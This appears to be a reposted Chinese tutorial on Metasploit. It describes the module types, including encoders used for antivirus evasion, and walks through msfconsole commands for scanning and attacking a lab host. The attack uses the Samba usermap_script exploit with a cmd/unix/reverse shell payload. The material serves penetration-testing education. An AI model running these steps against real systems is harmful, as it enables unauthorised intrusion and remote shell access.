Metasploit滲透攻擊


Metasploit滲透攻擊
源網址https://www.freebuf.com/column/194412.html
Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。
0X01Metasploit功能模塊
Auxiliaries(輔助模塊):
負責執行掃描、嗅探、指紋識別、信息收集、口令猜測和Dos攻擊等不會直接獲得目
標主機權限的輔助滲透測試
Exploit(漏洞利用模塊):
利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊的代碼
Payload(攻擊載荷模塊):
攻擊載荷是在滲透攻擊成功后促使目標系統運行的一段植入代碼
Post(后期滲透模塊):
在取得目標系統遠程監控權后,進行的如獲取敏感信息、跳板攻擊等操作
Encoders(編碼工具模塊):
免殺
Nop(空指令模塊):
在滲透攻擊構造惡意數據緩沖區時,常常要在真正要執行的Shellcode之前添加一段空指令區, 這樣當觸發滲透攻擊后跳轉執行ShellCode時,有一個較大的安全着陸區,從而避免受到內存 地址隨機化、返回地址計算偏差等原因造成的ShellCode執行失敗,提高滲透攻擊的可靠性。
0X02Metasploit滲透攻擊步驟
1. 掃描目標機系統,尋找可利用漏洞
Nessus
nmap -sV –script=nmap-vulners/vulscan.nse www.example.com
Metasploit使用search模塊搜索可用端口掃描模
Metasploit中利用Nmap工具 msf>nmap -O -Pn/-p0 URI
2. 選擇並配置漏洞利用模塊
3. 選擇並配置攻擊載荷模塊
4. 利用編碼模塊免殺
5. 滲透攻擊
EX:使用輔助模塊進行端口掃描
1.啟動Metasploit
~ msfconsole
2.使用輔助模塊進行端口掃描
search portscan
3.尋找合適的漏洞利用模塊並使用
4.查看並修改參數
msf > use auxiliary/scanner/portscan/tcp
>show options
>set rhost 192.168.80.100
>set threads 20
>show options
5.利用漏洞Exploit
>exploit
EX:使用nmap掃描端口並利用漏洞
1.啟動Metasploit
2.> nmap -sV 192.168.80.100
3.發現目標主機開啟samba 3.X服務,尋找相應漏洞模塊
> search samba
4.優先選擇被標記為“Excellent”的模塊,並查看描述信息
> use exploit/multi/samba/usermap_script
> info exploit/multi/samba/usermap_script
5.列舉並選擇攻擊載荷模塊
>show payloads
6.設置參數
> set payload cmd/unix/reverse
> show options
> exploit


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM